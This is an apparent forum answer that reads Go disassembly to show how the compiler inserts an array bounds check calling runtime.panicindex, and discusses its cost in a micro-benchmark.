400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
...
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
So if %rbx is greater than or equal to 2, then it jumps down to a call to runtime.panicindex. Given you're working with an array of size 2, that is clearly the bounds check. You could make the argument that the compiler should be smart enough to skip the bounds check in this particular case where the range of the index can be determined statically, but it seems that it isn't smart enough to do so yet.
While you're seeing a noticeable performance difference for this micro-benchmark, it might be worth considering whether this is actually representative of your actual code. If you're doing other stuff in your loop, the difference is likely to be less noticeable.
And while bounds checking does have a cost, in many cases it is better than the alternative of the program continuing with undefined behaviour.

Resources